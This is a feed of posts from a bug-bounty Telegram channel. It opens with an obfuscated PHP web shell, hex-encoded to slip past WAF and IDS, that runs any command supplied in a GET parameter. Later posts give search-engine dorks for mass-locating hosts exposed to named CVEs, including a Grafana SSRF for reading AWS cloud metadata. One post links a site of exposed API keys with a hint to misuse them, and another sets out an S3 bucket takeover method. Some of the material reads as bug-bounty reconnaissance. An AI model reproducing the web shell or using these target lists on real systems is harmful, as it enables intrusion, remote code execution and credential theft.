Brut Security
14.8K subscribers
920 photos
73 videos
287 files
976 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
โค7
Brut Security
Photo
๐ŸŒ€I made this payload that able to bypass WAF even IDS to execute RCE๐Ÿ’€

<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>



๐Ÿ‘€Hex decode:

if($x_=$_GET[0]){system($x_);
}


๐Ÿคซ DarkShadow's secret payload don't share outside โ˜ 
โค20๐Ÿ—ฟ8๐Ÿ‘3๐Ÿค”2
Hey Hunter's,
Here's allll useful commands check it out ๐Ÿ”ฅ
โค13๐Ÿซก6๐Ÿค2
CVE-2025-32756: Buffer Overflow in Fortinet products, 9.8 rating ๐Ÿ”ฅ

Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/nmu5K
๐Ÿ‘‰ Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"

Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
1๐Ÿ”ฅ8โค4๐Ÿซก1
Hey Hunter's,
DarkShadow here back again, just dropping a simple FOFA dork that i made to find all Grafana vulnerable versions which are using AWS and that help to you read all cloud metadata through Grafana SSRF CVE-2025-4123

FOFA dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0" body="Grafana v10.0.1" body="Grafana v10.0.2" body="Grafana v10.0.3" body="Grafana v10.0.4" body="Grafana v10.0.5" body="Grafana v10.0.6" body="Grafana v10.0.7" body="Grafana v10.0.8" body="Grafana v10.0.9" body="Grafana v10.0.10" body="Grafana v10.0.11" body="Grafana v10.0.12" body="Grafana v10.1.0" body="Grafana v10.1.1" body="Grafana v10.1.2" body="Grafana v10.1.3" body="Grafana v10.1.4" body="Grafana v10.1.5" body="Grafana v10.1.6" body="Grafana v10.1.7" body="Grafana v10.1.8" body="Grafana v10.1.9" body="Grafana v10.1.10" body="Grafana v10.2.0" body="Grafana v10.2.1" body="Grafana v10.2.2" body="Grafana v10.2.3" body="Grafana v10.2.4" body="Grafana v10.2.5" body="Grafana v10.2.6" body="Grafana v10.2.7" body="Grafana v10.3.0" body="Grafana v10.3.1" body="Grafana v10.3.2" body="Grafana v10.3.3" body="Grafana v10.3.4" body="Grafana v10.3.5" body="Grafana v10.4.0" body="Grafana v10.4.1" body="Grafana v10.4.2" body="Grafana v10.4.3" body="Grafana v10.4.4" body="Grafana v10.4.5" body="Grafana v10.4.6" body="Grafana v10.4.7" body="Grafana v10.4.8" body="Grafana v10.4.9" body="Grafana v10.4.10" body="Grafana v10.4.11" body="Grafana v10.4.12" body="Grafana v10.4.13" body="Grafana v10.4.14" body="Grafana v10.4.15" body="Grafana v10.4.16" body="Grafana v10.4.17" body="Grafana v11.0.0" body="Grafana v11.0.1" body="Grafana v11.0.2" body="Grafana v11.0.3" body="Grafana v11.0.4" body="Grafana v11.0.5" body="Grafana v11.1.0" body="Grafana v11.1.1" body="Grafana v11.1.2" body="Grafana v11.1.3" body="Grafana v11.1.4" body="Grafana v11.2.0" body="Grafana v11.2.1" body="Grafana v11.2.2" body="Grafana v11.2.3" body="Grafana v11.3.0" body="Grafana v11.3.1" body="Grafana v11.3.2" body="Grafana v11.3.3" body="Grafana v11.4.0" body="Grafana v11.4.1" body="Grafana v11.4.2" body="Grafana v11.4.3" body="Grafana v11.5.0" body="Grafana v11.5.1" body="Grafana v11.5.2" body="Grafana v11.5.3" body="Grafana v11.5.4" body="Grafana v11.5.5" body="Grafana v11.5.6" body="Grafana v11.6.0" || body="Grafana v12.0.0")


Grep the full dork in comment ๐Ÿ”ฅ

#dork #fofa #bugbountytips 
โค18๐Ÿ”ฅ7๐Ÿ‘2๐Ÿ—ฟ1
55,899 results ๐Ÿ’€
๐Ÿ‘14๐Ÿ”ฅ7โค1
CVE-2025-42989: Missing Authorization in SAP NetWeaver, 9.6 rating ๐Ÿ”ฅ

One of the vulnerabilities disclosed in a recent patch allows an authenticated user to escalate their privileges, which could critically impact the integrity and availability of the system.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/lB0fI
๐Ÿ‘‰ Dork: http.body:"This error page was generated by SAP Web Dispatcher!"

Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
โค6๐Ÿ˜ฑ4
Brut Security
https://www.unsecuredapikeys.com/
Your know, what you have to do ๐Ÿ˜
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿค10๐Ÿ”ฅ3
Brut Security pinned ยซ๐ŸšจIf you're looking for accurate IoT results, then Sign Up On @Netlas ๐Ÿ˜ฎโ€๐Ÿ’จhttps://app.netlas.io/ref/9cc61538/ยป
๐Ÿคฃ46โค3๐Ÿ”ฅ3๐Ÿ˜ข1
โ–ถ๏ธ It's LIVE!

๐Ÿ“ŒSubWatch โ€“ your next favorite tool for automated subdomain monitoring! ๐Ÿ”

โœ… Runs every 6 hours
โœ… Sends newly found subdomains directly to your Discord
โœ… Includes .txt file + message alerts
โœ… Perfect for bug bounty hunters & recon workflows

๐Ÿ“ฝ๏ธ Watch the YouTube video & get started now:
๐Ÿ‘‰
https://youtu.be/BkpSQKSTFUI

๐Ÿ“ฅ Download & Readme on GitHub:
๐Ÿ‘‰
https://github.com/Brut-Security/SubWatch

๐Ÿ”ง Powered by: subfinder, anew, jq, notify
Built with ๐Ÿ’™ by Brut Security

โค๏ธ Give it a try, share it with your team, and drop your reactions below!
Please open Telegram to view this post
VIEW IN TELEGRAM
โค19๐Ÿ‘4๐Ÿ”ฅ4๐Ÿ˜ข1
Brut Security pinned ยซโ–ถ๏ธ It's LIVE! ๐Ÿ“ŒSubWatch โ€“ your next favorite tool for automated subdomain monitoring! ๐Ÿ” โœ… Runs every 6 hours โœ… Sends newly found subdomains directly to your Discord โœ… Includes .txt file + message alerts โœ… Perfect for bug bounty hunters & recon workflowsโ€ฆยป
CVE-2025-47110: Cross-site Scripting in Magento (and Adobe Commerce), 9.1 rating ๐Ÿ”ฅ

An XSS vulnerability in Magento and Adobe Commerce allows an attacker to inject code into vulnerable forms and execute it in the victim's browser.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/v6wk6
๐Ÿ‘‰ Dork: tag.name:"magento" AND http.headers.server:"Apache"

Vendor's advisory: https://helpx.adobe.com/security/products/magento/apsb25-50.html
โค10๐Ÿ‘3
CVE-2025-4798, -4799: Absolute Path Traversal in DownloadManager WordPress Plugin, 4.9 - 7.2 ratingโ—๏ธ

Vulnerabilities shared with us by the pen tester who found them. Allow attackers to manipulate files on the server, which can lead to RCE.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/DH8EA
๐Ÿ‘‰ Dork: http.body:"plugins/wp-downloadmanager"

More information here: https://youtu.be/QTe3rf0-e7U?si=THZKoKeI1vN-arR7
๐Ÿ‘8โค2
๐Ÿคฃ49๐Ÿ˜3๐Ÿ˜ข2
Hey Hunters,
Sorry for the delayโ€”
DarkShadow here, back again dropping one of my secret methodologies ๐Ÿ˜

๐ŸŒ€ AWS S3 Bucket Takeover Like a Pro โ€” Super Simple but Highly Effective ๐Ÿ”ฅ

โœจBefore diving in, letโ€™s understand the whole scenario...

๐Ÿ‘€ 1. Which buckets are vulnerable to takeover?
๐Ÿ‘€ 2. Whatโ€™s the real impact of taking over an S3 bucket?
๐Ÿ‘€ 3. How do we find S3 buckets that are potentially vulnerable?
๐Ÿ‘€ 4. How can we validate whether a bucket was actually used by the target?


โšก 1. Vulnerable Buckets:
If a target previously used an S3 bucket and deleted itโ€”but the subdomain (CNAME) is still pointing to amazonaws.comโ€”thatโ€™s a perfect takeover opportunity.

โšก 2. Impact:
If the bucket is still referenced anywhere in the backend or services, and the target forgot to remove it, you might even achieve RCE. In some cases, it can lead to full system compromise.

โšก 3. Finding Buckets (Using FOFA):
Hereโ€™s how I hunt them down using FOFA:

๐Ÿง  FOFA Dork:

body="specified bucket does not exist" && (host="target.com" || host="target_domain_name_only") && port="443"

๐Ÿ” This dork gives you subdomains that point to missing or deleted buckets. FOFA indexes fingerprints across the webโ€”even for deleted resourcesโ€”so itโ€™s a goldmine for finding exposed assets the target forgot.

โšก 4. Validating Ownership:

๐Ÿ”Ž Method 1: GitHub Recon
Use GitHub dorks like:

org:target_org "target.s3.amazonaws.com"


Or simply search:

"target.s3.amazonaws.com"


You might discover hardcoded links, past commits, or configuration files that prove the target was using this bucket.

๐ŸŒ Method 2: DNS History (Not Always Effective, But Worth a Shot)
Check if the bucket was ever configured for static website hosting.

Use these tools to check historical DNS records:

https://securitytrails.com
https://dnsdumpster.com
https://viewdns.info
https://www.robtex.com

If any DNS leaks or CNAME records are found, analyze them to build your proof of ownership.


๐ŸŽฏ So guys, I hope you enjoyed reading this little piece of my methodology.
๐Ÿ’ฅ Donโ€™t forget to follow me ๐Ÿ‘‰๐Ÿผ DarkShadow

#dork #takeover #bugbountytips
๐Ÿ‘15โค12๐Ÿ‘2๐Ÿณ2๐Ÿ”ฅ1